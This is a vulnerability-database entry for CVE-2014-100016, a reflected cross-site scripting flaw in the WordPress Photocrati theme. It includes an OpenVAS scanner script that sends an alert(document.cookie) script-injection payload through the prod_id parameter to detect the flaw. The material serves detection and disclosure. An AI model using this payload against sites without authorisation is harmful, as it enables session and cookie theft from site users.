ID CVE-2014-100016 Type cve Reporter cve@mitre.org Modified 2017-09-08T01:29:00
Description
Cross-site scripting (XSS) vulnerability in photocrati-gallery/ecomm-sizes.php in the Photocrati theme for WordPress allows remote attackers to inject arbitrary web script or HTML via the prod_id parameter.
{"openvas": [{"lastseen": "2020-05-12T17:24:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-100016"], "description": "The host is installed with WordPress\n Photocrati theme and is prone to cross-site scripting vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2015-01-22T00:00:00", "id": "OPENVAS:1361412562310802089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802089", "type": "openvas", "title": "WordPress Photocrati Theme 'prod_id' Cross-Site Scripting Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress Photocrati Theme 'prod_id' Cross-Site Scripting Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802089\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2014-100016\");\n script_bugtraq_id(65238);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-01-22 12:44:09 +0530 (Thu, 22 Jan 2015)\");\n script_name(\"WordPress Photocrati Theme 'prod_id' Cross-Site Scripting Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with WordPress\n Photocrati theme and is prone to cross-site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw exists as input passed via the\n 'prod_id' GET parameter to /photocrati-theme/photocrati-gallery/ecomm-sizes.php\n script is not properly sanitised before being returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary HTML and script code in a user's browser session\n in context of an affected site.\");\n\n script_tag(name:\"affected\", value:\"WordPress Photocrati theme version\n 4.7.3. Other versions may also be affected.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available\n for at least one year since the disclosure of this vulnerability. Likely none will\n be provided anymore. General solution options are to upgrade to a newer release,\n disable respective features, remove the product or replace the product by another\n one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56690\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/90812\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/124986\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + '/wp-content/themes/photocrati-theme/photocrati'\n + '-gallery/ecomm-sizes.php';\n\nsndReq = http_get(item:url, port:http_port);\nrcvRes = http_keepalive_send_recv(port:http_port, data:sndReq);\n\nif(rcvRes && rcvRes =~ \"^HTTP/1\\.[01] 200\")\n{\n url = dir + '/wp-content/themes/photocrati-theme/photocrati-gallery/eco'\n + 'mm-sizes.php?prod_id=\"/><script>alert(document.cookie);</script>';\n\n if(http_vuln_check(port:http_port, url:url, check_header:TRUE,\n pattern:\"><script>alert\\(document.cookie\\);</script>\",\n extra_check:\">Add To Shopping Cart<\"))\n {\n report = http_report_vuln_url( port:http_port, url:url );\n security_message(port:http_port,data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-02-16T04:39:59", "bulletinFamily": "software", "cvelist": ["CVE-2014-100016"], "description": "The photocrati-theme WordPress theme was affected by a Reflected Cross-Site Scripting (XSS) security vulnerability.\n", "modified": "2019-10-21T11:19:58", "published": "2014-01-29T00:00:00", "id": "WPVDB-ID:43CC72EE-87C3-4089-A34D-380F1395CDFC", "href": "https://wpscan.com/vulnerability/43cc72ee-87c3-4089-a34d-380f1395cdfc", "type": "wpvulndb", "title": "Photocrati Theme 4.7.3 - Reflected Cross-Site Scripting (XSS)", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
